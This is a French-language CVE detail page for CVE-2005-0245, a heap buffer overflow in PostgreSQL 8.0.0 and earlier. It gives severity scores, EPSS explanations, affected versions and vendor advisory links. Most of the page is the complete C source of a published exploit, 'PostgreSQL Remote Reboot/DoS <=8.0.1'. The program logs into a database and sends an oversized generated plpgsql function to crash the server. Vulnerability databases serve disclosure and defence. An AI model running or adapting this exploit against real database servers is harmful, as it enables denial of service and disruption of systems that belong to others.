CVE-2005-0245 : Détail

CVE-2005-0245

1.41%V3
Network
2005-02-08
04h00 +00:00
2017-10-09
22h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in gram.y for PostgreSQL 8.0.0 and earlier may allow attackers to execute arbitrary code via a large number of arguments to a refcursor function (gram.y), which leads to a heap-based buffer overflow, a different vulnerability than CVE-2005-0247.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 25076

Date de publication : 2005-01-31 23h00 +00:00
Auteur : ChoiX
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/12417/info Multiple remote vulnerabilities affect PostgreSQL. These issues are due to design errors, buffer-mismanagement errors, and causes that are currently unspecified. The vulnerabilities are as follows: - The application fails to enforce function permissions. - A buffer overflow is triggered when cursor declaration occurs. - A denial-of-service issue resides in 'contrib/intagg'. Not enough information is currently available to provide a more in-depth technical description. This BID will be updated when more details are available. An attacker may leverage these issues to execute arbitrary code with the privileges of the vulnerable database process and to execute functions without requiring permission. Other attacks are also possible. /* PostgreSQL Remote Reboot <=8.01 * writen by ChoiX [choix@unl0ck.org] * (c) Unl0ck Research Team [www.unl0ck.org] * info: Server can be rebooted only if plpgsql language is switched on. * To compilate exploit you should have "libpq" library on your box * and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include -L/usr/local/pgsql/lib -lpq * Root exploits will be released later, coz now it's very dangerous to release it. * greets to: * unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe] * m00 members: ov3r */ #include <stdio.h> #include <getopt.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <libpq-fe.h> #define DEFAULT_PORT "5321" #define DEFAULT_DB "postgresql" #define FUNC_NAME "uKt_test" #define TABLE_NAME "unl0ck_table" char str[4000]; char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n"; char declare[] = "DECLARE\n"; char com[] = "\t--%\n"; char varible_REC[] = "\trec RECORD;\n"; char varible_var[] = "\tvar%d varchar := \'BBBB\';\n"; char begin[] = "BEGIN\n"; char select_1[] = "SELECT INTO rec FROM %s WHERE\n"; char select_2[] = "var%d = AAAA AND\n"; char select_3[] = "var1029 = AAAA;\n"; char end[] = "END\n"; char finish[] = "$$ LANGUAGE plpgsql\n"; void usage(char *name){ printf("PostgreSQL Remote DoS <=8.0.1\n"); printf("writen by ChoiX [choix@unl0ck.org]\n"); printf("(c) Unl0ck Research Team [info@unl0ck.org]\n"); printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] \n", name); printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT, DEFAULT_DB); exit(0); } int make_str(); int main(int argc, char *argv[]){ char opt; char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL; struct hostent *he; PGconn *conn; PGresult *res; while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){ switch(opt){ case 'H': host = optarg; break; case 'P': port = optarg; break; case 'u': user = optarg; break; case 'p': password = optarg; break; case 'd': dbname = optarg; break; default: usage(argv[0]); break; } } if(host == NULL) usage(argv[0]); if(user == NULL) usage(argv[0]); if(password == NULL) usage(argv[0]); if(port == NULL) port = DEFAULT_PORT; if(dbname == NULL) dbname = DEFAULT_DB; printf("\tPostgreSQL Remote DoS <=8.0.1\n"); printf("[*] Host/Port: %s/%s\n", host, port); printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password); conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password); if(PQstatus(conn) == CONNECTION_BAD){ PQfinish(conn); printf("[-] Cannot connect to the database\n"); exit(1); } printf("[+] Connected to the database\n"); make_str(); printf("[+] Command has been generated\n"); res = PQexec(conn, str); if (PQresultStatus(res) == PGRES_TUPLES_OK){ printf("[+] Command has been sent\n"); } if(PQstatus(conn) == CONNECTION_BAD){ printf("[+] Server has been rebooted\n"); exit(0); } else { printf("[-] Server hasnt been rebooted\n"); exit(0); } } int make_str(){ char temp[100]; int i; int len = sizeof(temp) -1; //write char create[] snprintf(temp, len, create, FUNC_NAME); strcpy(str,temp); //write char declare[] snprintf(temp, len, begin); strcat(str, temp); //write char varible_REC[] snprintf(temp, len, varible_REC); strcat(str, temp); //write char varible_var[] for(i = 0;i < 1029;i++){ snprintf(temp, len, varible_var, i); strcat(str, temp); } //write char begin[] snprintf(temp, len, begin); strcat(str, temp); //write char select_1[] snprintf(temp, len, select_1, TABLE_NAME); strcat(str, temp); //write char select_2[] for(i = 0;i < 1028;i++){ snprintf(temp, len, select_2, i); strcat(str, temp); } //write char select_3[] snprintf(temp, len, select_3); strcat(str, temp); //write char end[] snprintf(temp, len, temp); strcat(str, temp); //write char finish[] snprintf(temp, len, finish); strcat(str,temp); return 0; }

Products Mentioned

Configuraton 0

Postgresql>>Postgresql >> Version From (including) 7.3 To (excluding) 7.3.10

Postgresql>>Postgresql >> Version From (including) 7.4 To (excluding) 7.4.7

Postgresql>>Postgresql >> Version 8.0

Références

http://www.mandriva.com/security/advisories?name=MDKSA-2005:040
Tags : vendor-advisory, x_refsource_MANDRAKE
http://marc.info/?l=bugtraq&m=110806034116082&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2005-138.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/12948
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2005-150.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/12417
Tags : vdb-entry, x_refsource_BID
http://www.debian.org/security/2005/dsa-683
Tags : vendor-advisory, x_refsource_DEBIAN